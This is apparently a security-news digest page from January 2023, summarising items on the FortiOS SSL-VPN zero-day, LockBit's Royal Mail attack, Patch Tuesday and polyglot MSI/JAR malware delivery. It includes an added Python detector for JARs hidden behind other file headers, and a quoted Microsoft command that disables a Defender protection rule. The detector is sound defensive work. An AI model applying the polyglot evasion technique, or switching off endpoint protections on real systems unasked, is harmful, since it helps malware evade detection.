Autosummary: Versions range from 6.0.5 to 7.2.1. Models are FG100F, FG101F, FG200D, FG200E, FG201F, FG240D, FG3H0E, FG5H0E, FG6H1E, FG800D, FGT5HD, FGT60F, FGT80F.


                Call centres behind fake cryptocurrency scams shut down across Europe

                financial
                2023-01-13 https://www.bitdefender.com/blog/hotforsecurity/call-centres-behind-fake-cryptocurrency-scams-shut-down-across-europe/
European law enforcement agencies have dealt a blow to scammers running call centres across the continent that stole millions of Euros from cryptocurrency investors. Crime-fighting authorities teamed up to tackle organised criminal groups who tricked unwary members of the public into investing in fake cryptocurrency schemes. Read more in my article on the Hot for Security blog.

Autosummary: In addition, 261 individuals have been questioned in Bulgaria, Cyprus, Germany and Serbia, with 22 locations searched, including four call centres, two businesses, and 16 residences.


                FortiOS flaw was exploited to compromise governmental targets (CVE-2022-42475)

                exploits government
                2023-01-13 https://www.helpnetsecurity.com/2023/01/13/cve-2022-42475-exploited/

                A critical vulnerability in FortiOS SSL-VPN (CVE-2022-42475) that Fortinet has issued patches for in November 2022 has been exploited by attackers to compromise governmental or government-related targets, the company has shared. Fortinet says the attackers have advanced capabilities: they were able to reverse-engineer various parts of FortiOS to help them with the creation of the exploit, and use a Linux-based implant that was custom-made to run on that operating system. They also pointed out that … More



                Cybercriminals Using Polyglot Files in Malware Distribution to Fly Under the Radar

                exploits ciber
                2023-01-13 https://thehackernews.com/2023/01/cybercriminals-using-polyglot-files-in.html
Remote access trojans such as StrRAT and Ratty are being distributed as a combination of polyglot and malicious Java archive (JAR) files, once again highlighting how threat actors are continuously finding new ways to fly under the radar. "Attackers now use the polyglot technique to confuse security solutions that don't properly validate the JAR file format," Deep Instinct security researcher

Autosummary: If such a process has "-jar" as an argument, the filename passed as an argument should be treated as a JAR file regardless of the file extension or the output of the Linux "file" command.
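The detection advice above rests on one property of the JAR format: the Java runtime locates an archive from its end (the End-of-Central-Directory record), so bytes prepended to a valid JAR do not stop `java -jar` from running it, while a header-only sniffer such as `file` sees only the prefix. The following added example, written for this page and not taken from the Deep Instinct report or any vendor tool, implements both halves of that advice in Python: a tail-based ZIP/JAR check that is compared against a naive magic-byte verdict, and the `-jar` command-line rule from the quote. The function names, the constructed fake CAB prefix and the placeholder class bytes are assumptions for illustration only.

```python
"""Spot a JAR hidden behind another format's header (polyglot check).

Added example. Java's JarFile/ZipFile walk back from the END of the file
to find the End-of-Central-Directory (EOCD) record, so a leading CAB/MSI/PE
header does not stop `java -jar` from opening the archive.
"""
import io
import zipfile

EOCD_SIG = b"PK\x05\x06"      # End-of-Central-Directory signature
EOCD_MIN_LEN = 22             # fixed EOCD size without the trailing comment
MAX_COMMENT_LEN = 0xFFFF      # ZIP comment length is a 16-bit field


def find_eocd(data: bytes):
    """Offset of the EOCD record, searched from the tail as Java does, or None."""
    window_start = max(0, len(data) - (EOCD_MIN_LEN + MAX_COMMENT_LEN))
    idx = data.rfind(EOCD_SIG, window_start)
    if idx == -1 or len(data) - idx < EOCD_MIN_LEN:
        return None
    return idx


def leading_magic(data: bytes) -> str:
    """Header-only classification standing in for a naive magic-byte check (small constructed subset)."""
    if data.startswith(b"MSCF"):
        return "CAB"
    if data.startswith(b"PK\x03\x04"):
        return "ZIP"
    if data.startswith(b"MZ"):
        return "PE"
    return "unknown"


def classify(data: bytes) -> dict:
    """Combine the header verdict with the tail-based ZIP check and flag disagreements."""
    header = leading_magic(data)
    has_zip_tail = find_eocd(data) is not None
    entries = []
    if has_zip_tail:
        try:
            # zipfile also locates the archive via the EOCD and tolerates prepended bytes
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                entries = zf.namelist()
        except zipfile.BadZipFile:
            entries = []
    return {
        "header": header,                                   # what `file`-style sniffing would say
        "zip_tail": has_zip_tail,                           # what the JVM actually cares about
        "jar": "META-INF/MANIFEST.MF" in entries,           # runnable as a JAR
        "polyglot": has_zip_tail and header != "ZIP",       # header and tail disagree
        "entries": entries,
    }


def jar_from_cmdline(argv):
    """The rule quoted above: whatever follows `-jar` is the JAR, regardless of its extension."""
    if "-jar" not in argv:
        return None
    i = argv.index("-jar")
    return argv[i + 1] if i + 1 < len(argv) else None


def build_sample_jar() -> bytes:
    """Constructed minimal JAR: a manifest plus a placeholder class entry (not real bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Loader\n")
        zf.writestr("Loader.class", b"\xca\xfe\xba\xbe" + b"\x00" * 16)
    return buf.getvalue()


# Constructed polyglot: a fake CAB header (MSCF plus padding, not a valid cabinet) in front of the JAR.
FAKE_CAB_PREFIX = b"MSCF" + b"\x00" * 60
SAMPLE_POLYGLOT = FAKE_CAB_PREFIX + build_sample_jar()

if __name__ == "__main__":
    for label, blob in [("plain jar", build_sample_jar()),
                        ("cab+jar", SAMPLE_POLYGLOT),
                        ("cab only", FAKE_CAB_PREFIX)]:
        print(label, classify(blob))
    print(jar_from_cmdline(["java", "-jar", "invoice.cab"]))
```

The `polyglot` flag is the actionable signal: a file whose header says CAB or PE but whose tail parses as a ZIP with a manifest is exactly what a header-only scanner misses, and the same check applies to any file named in a `java -jar` command line whatever its extension.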


                FortiOS Flaw Exploited as Zero-Day in Attacks on Government and Organizations

                exploits government
                2023-01-13 https://thehackernews.com/2023/01/fortios-flaw-exploited-as-zero-day-in.html
A zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations. "The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers said in a post-mortem analysis published this week. The



                LockBit ransomware operation behind the Royal Mail cyberattack

                exploits ransomware ciber
                2023-01-13 https://securityaffairs.com/140735/malware/lockbit-ransomware-royal-mail-attack.html

                The cyberattack on Royal Mail, Britain’s postal service, is a ransomware attack that was linked to the LockBit ransomware operation. Royal Mail, the British multinational postal service and courier company, this week announced that a “cyber incident” has a severe impact on its operation. The incident only impacted Royal Mail’s international export services, the company said it is temporarily […]



                Buggy Microsoft Defender ASR rule deletes Windows app shortcuts

                exploits
                2023-01-13 https://www.bleepingcomputer.com/news/microsoft/buggy-microsoft-defender-asr-rule-deletes-windows-app-shortcuts/
Microsoft has addressed a false positive triggered by a buggy Microsoft Defender ASR rule that would delete application shortcuts from the desktop, the Start menu, and the taskbar and, in some cases, render existing shortcuts unusable as they couldn't be used to launch the linked apps. [...]

                Autosummary: " You can put the ASR rule to Audit Mode using one of the following methods: The fourth option is to set the rule to disabled mode using the following Powershell command: Add-MpPreference -AttackSurfaceReductionRules_Ids 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b -AttackSurfaceReductionRules_Actions Disabled Until the issue is completely fixed and all deleted shortcuts can be restored, Microsoft advised customers to directly launch Office apps using the Office app or the Microsoft 365 app launcher. "


                PoC exploits released for critical bugs in popular WordPress plugins

                exploits
                2023-01-13 https://www.bleepingcomputer.com/news/security/poc-exploits-released-for-critical-bugs-in-popular-wordpress-plugins/
                Three popular WordPress plugins with tens of thousands of active installations are vulnerable to high-severity or critical SQL injection vulnerabilities, with proof-of-concept exploits now publicly available. [...]

                Autosummary: Finally, Tenable discovered CVE-2023-23490, a "high-severity" SQL injection flaw in "Survey Marker," a WordPress plugin used by 3,000 websites for surveys and market research.


                3 ways Malwarebytes helps you browse securely and privately online

                exploits
                2023-01-13 https://www.malwarebytes.com/blog/personal/2023/01/3-ways-malwarebytes-helps-you-browse-securely-and-privately-online

                Categories: Personal

                The Internet is kind of like the Wild West when it comes to threats to our privacy and security. But Malwarebytes can help you become the sheriff of your own digital frontier.


                The post 3 ways Malwarebytes helps you browse securely and privately online appeared first on Malwarebytes Labs.

                "

                Autosummary: Your name, your address, location data, and more, are all being collected, packaged up, and sold to advertisers at any given moment. With the Malwarebytes Premium + Privacy VPN bundle, you get total protection with smart antivirus, faster, safer web browsing, and our next-gen VPN for your online privacy. While no single method is ever 100 percent foolproof, there are some tried and true ways for keeping your data (and device) safe that, if put into practice, will guard you from most of the threats and prying eyes on the Internet. Chrome has the infamously useless "Do Not Track" setting, and anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen, but they work with variable levels of success and aren't enough by themselves. Whether it's blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.


                Patch now to address critical Windows zero-day flaw

                exploits
                2023-01-13 https://www.computerworld.com/article/3685534/patch-now-to-address-critical-windows-zero-day-flaw.html#tk.rss_security

                The first Patch Tuesday of the year from Microsoft addresses 98 security vulnerabilities, with 10 classified as critical for Windows. One vulnerability (CVE-2023-21674) in a core section of Windows code is a zero-day that requires immediate attention. And Adobe has returned with a critical update, paired with a few low-profile patches for the Microsoft Edge browser.

                We have added the Windows and Adobe updates to our “Patch Now” list, recognizing that this month’s patch deployments will require significant testing and engineering effort. The team at Application Readiness has provided a helpful infographic that outlines the risks associated with each of the updates for this January update cycle.


                "

                Autosummary: They cover the following key components: Microsoft Local Security Authority Server (lsasrv); Microsoft WDAC OLE DB provider (and ODBC driver) for SQL; Windows Backup Engine; Windows Cryptographic Services; Windows Error Reporting (WER); Windows LDAP (Lightweight Directory Access Protocol). Generally, this is an update focused on updating the network and local authentication stack with a few fixes to last month’s patch cycle. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (NET Core, .NET As all the high-risk changes affect the Microsoft Windows printing subsystem (though we have not seen any published functionality changes), we strongly recommend the following printing-focused testing: Add and remove watermarks when printing. Given the large number of changes included in this January patch cycle, I have broken down the testing scenarios into high risk and standard risk groups: High risk: This January update from Microsoft delivers a significant number of high-risk changes to the system kernel and printing subsystems within Windows. More generally, given the broad nature of this update, we suggest testing the following Windows features and components: Test user-based scenarios that rely upon touchpoint and gesture support.


                APT group trojanizes Telegram app – Week in security with Tony Anscombe

                exploits
                2023-01-13 https://www.welivesecurity.com/videos/strongpity-apt-telegram-shagle-week-security-tony-anscombe/

                StrongPity"s backdoor is fitted with various spying features and can record phone calls, collect texts, and gather call logs and contact lists

                The post APT group trojanizes Telegram app – Week in security with Tony Anscombe appeared first on WeLiveSecurity

                "

                Autosummary: "


                ThriveDX and Exclusive Networks address the cybersecurity talent shortage in Europe

                ciber
                2023-01-12 https://www.helpnetsecurity.com/2023/01/12/thrivedx-exclusive-networks/

                ThriveDX is launching a road tour across Europe from Jan. 11 to Feb. 23, 2023 to introduce the company’s human factor security solutions to Exclusive Networks’ ecosystem of more than 25,000 partners and to address the cybersecurity talent shortage, skills gap and lack of diversity and inclusion in the industry. In October 2022, ThriveDX and Exclusive Networks announced their strategic partnership, following Exclusive Networks’ participation as a founding partner in the ThriveDX Cyber Talent Hub. … More

                The post ThriveDX and Exclusive Networks address the cybersecurity talent shortage in Europe appeared first on Help Net Security.

                "

                Autosummary: "


                Post-ransomware attack, The Guardian warns staff their personal data was accessed

                exploits
                2023-01-12 https://grahamcluley.com/post-ransomware-attack-the-guardian-warns-staff-their-personal-data-was-accessed/
                Three weeks after The Guardian newspaper was hit by a ransomware attack, it warns staff members that their personal data was accessed.

                Autosummary: According to the email, data accessed includes: names, addresses, dates of birth, National Insurance numbers, bank account details.


                Free decryptor for victims of MegaCortex ransomware released

                exploits ransomware
                2023-01-12 https://grahamcluley.com/free-decryptor-for-victims-of-megacortex-ransomware-released/
                The experts at security firm Bitdefender have released a universal decryptor for victims of the MegaCortex family of ransomware, which is estimated to have caused more than 1800 infections - mostly of businesses.

                Autosummary: "


                6 oversights that enable data breaches

                financial
                2023-01-12 https://www.helpnetsecurity.com/2023/01/12/stolen-data/

                Personal employee or customer data accounted for nearly 45% of all data stolen between July 2021 and June 2022, while companies’ source code and proprietary information accounted for a further 6.7% and 5.6% respectively, according to Imperva. More positively, the research found that theft of credit card information and password details dropped by 64% compared to 2021. “It’s very encouraging to see such a decline in stolen credit card data and passwords. It suggests that … More

                The post 6 oversights that enable data breaches appeared first on Help Net Security.

                "

                Autosummary: "


                Alert: Hackers Actively Exploiting Critical "Control Web Panel" RCE Vulnerability

                exploits
                2023-01-12 https://thehackernews.com/2023/01/alert-hackers-actively-exploiting.html
                Malicious actors are actively attempting to exploit a recently patched critical vulnerability in Control Web Panel (CWP) that enables elevated privileges and unauthenticated remote code execution (RCE) on susceptible servers. Tracked as CVE-2022-44877 (CVSS score: 9.8), the bug impacts all versions of the software before 0.9.8.1147 and was patched by its maintainers on October 25, 2022. Control

                Autosummary: "


                Cisco won’t fix router flaws even though PoC exploit is available (CVE-2023-20025, CVE-2023-20026)

                exploits
                2023-01-12 https://www.helpnetsecurity.com/2023/01/12/cve-2023-20025-cve-2023-20026/

                Cisco has acknowledged one critical (CVE-2023-20025) and two medium-severity (CVE-2023-20026, CVE-2023-20045) vulnerabilities affecting some of its Small Business series of routers, but won’t be fixing them as the devices “have entered the end-of-life process.” Proof-of-concept exploit code for CVE-2023-20025 and CVE-2023-20026 is available online, but there is currently no indication of any of these flaws being exploited by attackers. About the vulnerabilities CVE-2023-20025 is an authentication bypass vulnerability in the web-based management interface of Cisco … More

                The post Cisco won’t fix router flaws even though PoC exploit is available (CVE-2023-20025, CVE-2023-20026) appeared first on Help Net Security.

                "

                Autosummary: "


                Patch where it Hurts: Effective Vulnerability Management in 2023

                exploits
                2023-01-12 https://thehackernews.com/2023/01/patch-where-it-hurts-effective.html
                A recently published Security Navigator report data shows that businesses are still taking 215 days to patch a reported vulnerability. Even for critical vulnerabilities, it generally takes more than 6 months to patch. Good vulnerability management is not about being fast enough in patching all potential breaches. It's about focusing on the real risk using vulnerability prioritization to correct

                Autosummary: Instead, we should focus on those that pose a real risk based on the threat landscape and the organizational context. The concept of risk-based vulnerability management: The objective is to focus on the most critical assets and the assets at higher risk of being targeted by threat actors. Thanks to the risk scoring given per vulnerability, which can be matched with threat intelligence criteria like "easily exploitable", "exploited in wild" or "widely exploited" for instance, prioritizing remediation effectively is much easier. Five key steps to implement a risk-based vulnerability management program: Identification: Identify all your assets to discover your attack surface; a discovery scan can help give a first overview.


                Twitter: 200M dataset was not obtained through the exploitation of flaws in its systems

                exploits
                2023-01-12 https://securityaffairs.com/140683/data-breach/twitter-investigation-update.html

                Twitter said that its investigation revealed that users’ data offered for sale online was not obtained from its systems. Twitter provided an update on its investigation launched after data of 200 Million users were offered for sale online. The company has found “no evidence” that the data were obtained by hacking into its systems. Below […]

                The post Twitter: 200M dataset was not obtained through the exploitation of flaws in its systems appeared first on Security Affairs.

                "

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, Twitter)


                Vice Society ransomware claims attack on Australian firefighting service

                exploits ransomware
                2023-01-12 https://www.bleepingcomputer.com/news/security/vice-society-ransomware-claims-attack-on-australian-firefighting-service/
                Australia"s Fire Rescue Victoria has disclosed a data breach caused by a December cyberattack that is now claimed by the Vice Society ransomware gang. [...] "

                Autosummary: Bank account details (BSB, account name, and number); superannuation details; government-issued identity information; driver's license details; passport details; Tax File numbers; birth, death, and marriage certificates. In addition to the above, because the hackers accessed the agency's email system, which remains offline, they may also have accessed or stolen sensitive email communications.


                Fortinet: Govt networks targeted with now-patched SSL-VPN zero-day

                exploits
                2023-01-12 https://www.bleepingcomputer.com/news/security/fortinet-govt-networks-targeted-with-now-patched-ssl-vpn-zero-day/
                Fortinet says unknown attackers exploited a FortiOS SSL-VPN zero-day vulnerability patched last month in attacks against government organizations and government-related targets. [...]

                Autosummary: "The discovered Windows sample attributed to the attacker displayed artifacts of having been compiled on a machine in the UTC+8 timezone, which includes Australia, China, Russia, Singapore, and other Eastern Asian countries. "


                Cyberattack halts Royal Mail's overseas post

                ciber
                2023-01-12 https://www.malwarebytes.com/blog/news/2023/01/cyberattack-halts-royal-mails-overseas-post

                Categories: News

                Tags: royal mail, cyber attack, post, disruption

                We take a look at reports that Royal Mail is experiencing severe issues due to an unnamed cyberattack.


                The post Cyberattack halts Royal Mail's overseas post appeared first on Malwarebytes Labs.

                "

                Autosummary: " Hunting for clues The attack is being investigated by third parties, but there’s no word currently with regard to how quickly the services will be back online. "


                Researchers warn AI-generated phishing attacks are becoming more convincing

                financial
                2023-01-12 https://www.tripwire.com/state-of-security/ai-generated-phishing-attacks-are-becoming-more-convincing
                It"s time for you and your colleagues to become more skeptical about what you read. That"s a takeaway from a series of experiments undertaken using GPT-3 AI text-generating interfaces to create malicious messages designed to spear-phish, scam, harrass, and spread fake news. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: Amongst the use cases explored by the research were the use of GPT-3 models to create: Phishing content – emails or messages designed to trick a user into opening a malicious attachment or visiting a malicious link; Social opposition – social media messages designed to troll and harass individuals or to cause brand damage; Social validation – social media messages designed to advertise or sell, or to legitimize a scam; Fake news – research into how well GPT-3 can generate convincing fake news articles of events that weren’t part of its training set. All of these could, of course, be useful to cybercriminals hell-bent on scamming the unwary or spreading unrest.


                Critical vulnerabilities in Siemens PLC devices could allow bypass of protected boot features (CVE-2022-38773)

                industry
                2023-01-12 https://www.helpnetsecurity.com/2023/01/12/cve-2022-38773/

                Red Balloon Security disclosed multiple, critical architectural vulnerabilities in the Siemens SIMATIC and SIPLUS S7-1500 Series PLC that allow for bypass of all protected boot features. These vulnerabilities affect over 120 different models of the Siemens S7-1500 CPU product family. [Figure: The vulnerable implementation of RoT using a secure cryptographic processor.] If the shared cryptographic material is captured, adversaries may use the secure cryptographic processor as an oracle to encrypt and decrypt tampered firmware. Red Balloon … More

                The post Critical vulnerabilities in Siemens PLC devices could allow bypass of protected boot features (CVE-2022-38773) appeared first on Help Net Security.

                "

                Autosummary: “While these vulnerabilities technically require physical access to exploit, it is possible for sophisticated attackers to ‘chain,’ or combine, these vulnerabilities with other remote access vulnerabilities on the same network to install malicious firmware without the need for in-person contact.”


                IcedID Malware Strikes Again: Active Directory Domain Compromised in Under 24 Hours

                exploits
                2023-01-12 https://thehackernews.com/2023/01/icedid-malware-strikes-again-active.html
                A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access. "Throughout the attack, the attacker followed a routine of recon commands, credential theft, lateral movement by abusing Windows protocols, and executing Cobalt Strike on the newly compromised host," Cybereason researchers said in

                Autosummary: IcedID, also known by the name BokBot, started its life as a banking trojan in 2017 before evolving into a dropper for other malware, joining the likes of Emotet, TrickBot, Qakbot, Bumblebee, and Raspberry Robin.


                Over 100 Siemens PLC Models Found Vulnerable to Firmware Takeover

                industry
                2023-01-12 https://thehackernews.com/2023/01/over-100-siemens-plc-models-found.html
                Security researchers have disclosed multiple architectural vulnerabilities in Siemens SIMATIC and SIPLUS S7-1500 programmable logic controllers (PLCs) that could be exploited by a malicious actor to stealthily install firmware on affected devices and take control of them. Discovered by Red Balloon Security, the issues are tracked as CVE-2022-38773 (CVSS score: 4.6), with the low severity

                Autosummary: "


                Threat actors actively exploit Control Web Panel RCE following PoC release

                exploits
                2023-01-12 https://securityaffairs.com/140698/hacking/web-panel-rce-exploitation.html

                Threat actors are actively exploiting a recently patched critical remote code execution (RCE) vulnerability in Control Web Panel (CWP). Threat actors are actively exploiting a recently patched critical vulnerability, tracked as CVE-2022-44877 (CVSS score: 9.8), in Control Web Panel (CWP). The exploitation attempts began on January 6, 2023, after a proof-of-concept (PoC) exploit code was published […]

                The post Threat actors actively exploit Control Web Panel RCE following PoC release appeared first on Security Affairs.

                "

                Autosummary: — Germán Fernández (@1ZRR4H), January 11, 2023. The exploitation attempts began on January 6, 2023, after a proof-of-concept (PoC) exploit code was published online.


                Microsoft: Cuba ransomware hacking Exchange servers via OWASSRF flaw

                exploits ransomware
                2023-01-12 https://www.bleepingcomputer.com/news/security/microsoft-cuba-ransomware-hacking-exchange-servers-via-owassrf-flaw/
                Microsoft says Cuba ransomware threat actors are hacking their way into victims' networks via Microsoft Exchange servers unpatched against a critical server-side request forgery (SSRF) vulnerability also exploited in Play ransomware attacks. [...]

                Autosummary: While not as prolific as Cuba ransomware and although first spotted a lot more recently, in June 2022, Play ransomware has been quite active and has already hit dozens of victims worldwide, including Rackspace, the German H-Hotels hotel chain, the Belgium city of Antwerp, and Argentina's Judiciary of Córdoba.


                MetaMask warns of new "Address Poisoning" cryptocurrency scam

                financial
                2023-01-12 https://www.bleepingcomputer.com/news/security/metamask-warns-of-new-address-poisoning-cryptocurrency-scam/
                Cryptocurrency wallet provider MetaMask is warning users of a new scam called "Address Poisoning" used to trick users into sending funds to a scammer rather than an intended recipient. [...]

                Autosummary: Scammers poison your MetaMask transactions: In a new post by MetaMask, the developers warn of a new scam called "Address Poisoning" that relies on poisoning the wallet's transaction history with scammers' addresses that are very similar to addresses with which a user recently transacted.


                European police takes down call centers behind cryptocurrency scams

                financial
                2023-01-12 https://www.bleepingcomputer.com/news/security/european-police-takes-down-call-centers-behind-cryptocurrency-scams/
                Multiple call centers across Europe controlled by a criminal organization involved in online investment fraud were taken down this week following a cross-border investigation started in June 2022. [...]

                Autosummary: The organized crime group behind the taken-down call centers coordinated an army of 200 "traders" who called targets in English, Russian, Polish, and Hindi to present fake investment opportunities in cryptocurrency, commodities, and foreign currencies, scamming their victims out of at least €3,000,000 each month.


                Royal Mail cyberattack linked to LockBit ransomware operation

                exploits ransomware ciber
                2023-01-12 https://www.bleepingcomputer.com/news/security/royal-mail-cyberattack-linked-to-lockbit-ransomware-operation/
                A cyberattack on Royal Mail, UK's largest mail delivery service, has been linked to the LockBit ransomware operation. [...]

                Autosummary: [Image: LockBit 3.0 ransom note printed during Royal Mail cyberattack (Source: Daniel Card on Twitter)] The ransom note states it was created by "LockBit Black Ransomware," which is the operation's latest encryptor name as it includes code and features from the now-shut-down BlackMatter ransomware gang.


                RAT malware campaign tries to evade detection using polyglot files

                exploits
                2023-01-12 https://www.bleepingcomputer.com/news/security/rat-malware-campaign-tries-to-evade-detection-using-polyglot-files/
                Operators of the StrRAT and Ratty remote access trojans (RAT) are running a new campaign using polyglot MSI/JAR and CAB/JAR files to evade detection from security tools. [...]

                Autosummary: JAR files are archives identified as such by a record at their end, while in MSI, the file type identifier is a “magic header” at the beginning of the file, so threat actors can easily combine the two formats into a single file.


                Android TV box on Amazon came pre-installed with malware

                exploits
                2023-01-12 https://www.bleepingcomputer.com/news/security/android-tv-box-on-amazon-came-pre-installed-with-malware/
                A Canadian system administrator discovered that an Android TV box purchased from Amazon was pre-loaded with persistent, sophisticated malware baked into its firmware. [...]

                Autosummary: To avoid such risks, you can pick streaming devices from reputable vendors like Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick.


                Update now! Patch Tuesday January 2023 includes one actively exploited vulnerability

                exploits
                2023-01-12 https://www.malwarebytes.com/blog/news/2023/01/update-now-patch-tuesday-january-2023-includes-one-actively-exploited-vulnerability

                Categories: Exploits and vulnerabilities, News

                Tags: patch Tuesday, CVE-2023-21674, APLC, CVE-2023-21743, Sharepoint, CVE-2023-21563, BitLocker

                The second Tuesday of the year brings us many updates, including one for an actively exploited vulnerability that could lead to elevation of privileges


                The post Update now! Patch Tuesday January 2023 includes one actively exploited vulnerability appeared first on Malwarebytes Labs.

                "

                Autosummary: BitLocker: Another interesting one, albeit only for those that use BitLocker, is CVE-2023-21563, a BitLocker security feature bypass vulnerability. The first Microsoft Patch Tuesday of 2023 is an important one to start off the year with.


                Critical bug in Cisco EoL Small Business Routers will receive no patch

                exploits
                2023-01-12 https://securityaffairs.com/140712/security/critical-bug-cisco-eol-routers.html

                Cisco warns of a critical flaw in small business RV016, RV042, RV042G, and RV082 routers, which have reached end of life (EoL). Cisco is warning of a critical vulnerability, tracked as CVE-2023-20025 (CVSS score of 9.0), that impacts small business RV016, RV042, RV042G, and RV082 routers. The IT giant announced that these devices will receive no security […]

                The post Critical bug in Cisco EoL Small Business Routers will receive no patch appeared first on Security Affairs.

                "

                Autosummary: Cisco also addressed a remote command execution vulnerability, tracked as CVE-2023-20026 (CVSS Score 6.5), that impacts Cisco Small Business RV016, RV042, RV042G, and RV082 Routers.


                Waterfall Security Solutions partners with Yokogawa to improve industrial security

                industry
                2023-01-11 https://www.helpnetsecurity.com/2023/01/11/waterfall-security-solutions-yokogawa/

                Waterfall Security Solutions announced a collaboration agreement with Yokogawa, a provider of industrial automation and test and measurement solutions. This new collaboration will make Waterfall’s Unidirectional Gateway cybersecurity products and technologies available to Yokogawa’s customers globally. In a world where cyber threats to industrial operations continue to become more powerful and more pervasive, making unidirectional protections available more widely will dramatically improve industrial security programs and preparedness. “Operational and technical reliability is a key focus … More

                The post Waterfall Security Solutions partners with Yokogawa to improve industrial security appeared first on Help Net Security.

                "

                Autosummary: Strong unidirectional security also enables and simplifies Yokogawa’s customers’ compliance with industrial cybersecurity best practices world-wide, including IEC 62443, France’s ANSSI, NERC CIP, the IIoT Security Framework, CENELEC TS 50701, and many more.


                New Dark Pink APT group targets govt and military with custom malware

                exploits
                2023-01-11 https://www.bleepingcomputer.com/news/security/new-dark-pink-apt-group-targets-govt-and-military-with-custom-malware/
                Attacks targeting government agencies and military bodies in multiple countries in the APAC region have been attributed to what appears to be a new advanced threat actor that leverages custom malware to steal confidential information. [...]

                Autosummary: Chrome, Microsoft Edge, CocCoc, Chromium, Brave, Atom, Uran, Sputnik, Slimjet, Epic Privacy, Amigo, Vivaldi, Kometa, Nichrome, Maxthon, Comodo Dragon, Avast Secure Browser, and Yandex Browser.


                Attackers abuse business-critical cloud apps to deliver malware

                exploits
                2023-01-11 https://www.helpnetsecurity.com/2023/01/11/cloud-applications-malware/

                Over 400 distinct cloud applications delivered malware in 2022, nearly triple the amount seen in the prior year, and 30% of all cloud malware downloads in 2022 originated from Microsoft OneDrive, according to Netskope. Cloud applications are widely used by businesses, a fact not lost on attackers, which view these apps as an ideal home for hosting malware and causing harm. Researchers examined how these cloud security trends are shifting and advise organizations on how … More

                The post Attackers abuse business-critical cloud apps to deliver malware appeared first on Help Net Security.

                "

                Autosummary: In 2022, several geographic regions saw significant increases in the overall percentage of cloud vs. web-delivered malware compared to 2021, including: Australia (50% in 2022 compared to 40% in 2021); Europe (42% in 2022 compared to 31% in 2021); Africa (42% in 2022 compared to 35% in 2021); Asia (45% in 2022 compared to 39% in 2021).


                Microsoft Issues January 2023 Patch Tuesday Updates, Warns of Zero-Day Exploit

                exploits
                2023-01-11 https://thehackernews.com/2023/01/microsoft-issues-january-2023-patch.html
                The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild. 11 of the 98 issues are rated Critical and 87 are rated Important in severity, with one of the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to

                Autosummary: What"s more, CVE-2023-21674 is the fourth such flaw identified in ALPC – an inter-process communication (IPC) facility provided by the Microsoft Windows kernel – after CVE-2022-41045, CVE-2022-41093, and CVE-2022-41100 (CVSS scores: 7.8), the latter three of which were plugged in November 2022." The January update further remediates a number of privilege escalation flaws, including one in Windows Credential Manager (CVE-2023-21726, CVSS score: 7.8) and three affecting the Print Spooler component (CVE-2023-21678, CVE-2023-21760, and CVE-2023-21765). "


                Microsoft Patch Tuesday for January 2023 fixed actively exploited zero-day

                exploits
                2023-01-11 https://securityaffairs.com/140633/security/microsoft-patch-tuesday-for-january-2023.html

                Microsoft Patch Tuesday security updates for January 2023 fixed 97 flaws and an actively exploited zero-day. Microsoft Patch Tuesday security updates for January 2023 addressed a total of 98 vulnerabilities in Microsoft Windows and Windows Components; Office and Office Components; .NET Core and Visual Studio Code, 3D Builder, Azure Service Fabric Container, Windows BitLocker, Windows […]

                The post Microsoft Patch Tuesday for January 2023 fixed actively exploited zero-day appeared first on Security Affairs.

                "

                Autosummary: [table excerpt, rows partially truncated]
                CVE-2023-21682 Windows Point-to-Point Protocol (PPP) Information Disclosure Vulnerability Important 5.3 No
                CVE-2023-21557 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability Important 7.5 No No
                CVE-2023-21676 Windows Lightweight Directory Access Protocol (LDAP) [row truncated]
                One of the flaws addressed this month, tracked as CVE-2023-21674 (CVSS score 8.8), is listed as being in the wild at the time of release. Another issue fixed by Microsoft is the CVE-2023-21549 (CVSS Score 8.8) flaw, which is listed as publicly known at the time of release. Here’s the full list of flaws addressed by Microsoft Patch Tuesday security updates for January 2023 (excerpt):
                CVE Title Severity CVSS Public Exploited
                CVE-2023-21674 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 8.8 No No
                CVE-2023-21524 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability Important 7.8 No No
                CVE-2023-21537 Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability Important 7.8 No No
                CVE-2023-21757 Windows Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability Important 7.5 No No
                CVE-2023-21543 Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability Critical 8.1 No No
                CVE-2023-21546 Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability Critical 8.1 "


                Google is calling EU cybersecurity founders

                ciber
                2023-01-11 https://www.helpnetsecurity.com/2023/01/11/google-growth-academy-eu-cybersecurity/

                Google announced that the Google for Startups Growth Academy: Cybersecurity program now accepts applications from EU companies. The three-month program, announced last fall, will start in April and connect the finest of Google with the top European cybersecurity firms. From seed level to Series A, the chosen companies will participate in workshops led by a combination of Google and industry professionals. They will receive specialized mentoring in strategy, sales, and partnerships — including from executives … More

                The post Google is calling EU cybersecurity founders appeared first on Help Net Security.

                "

